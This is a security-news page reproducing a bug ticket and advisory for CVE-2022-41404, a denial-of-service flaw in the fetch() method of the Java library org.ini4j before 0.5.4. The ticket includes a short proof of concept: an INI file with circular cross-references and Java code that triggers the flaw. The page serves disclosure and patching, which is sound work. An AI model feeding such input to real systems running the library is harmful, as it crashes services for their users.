Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-41404: [ini4j] / Bugs / #56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.

An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.

CVE
#dos#java
  • Home

  • Browse

  • [ini4j]

  • Bugs

  • Summary

  • Files

  • Reviews

  • Support

  • Wiki

  • Tickets ▾

    • Feature Requests
    • Bugs
    • Patches
  • Discussion

  • Donate

  • Code

  • Cvs

Menu ▾ ▴

#56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.

Status: open

Priority: 9

Updated: 2022-09-20

Created: 2022-09-20

Private: No

Test logic usable to reproduce the behaviour
payload:
----payload.ini

[dopey] weight=${bashful/weight} height=${doc/height}

[bashful] weight=${dopey/weight} height=${dopey/height}

[doc] weight=49.5 height=87.7

----java poc

Iniini=newIni(); ini.load(newFileReader(newFile(“/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini”)) ); ini.get(“dopey”).fetch(“weight”);

1 Attachments

Discussion

Log in to post a comment.

Related news

GHSA-jr6h-r7vg-f9mc: org.ini4j allows attackers to cause a Denial of Service (DoS)

An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907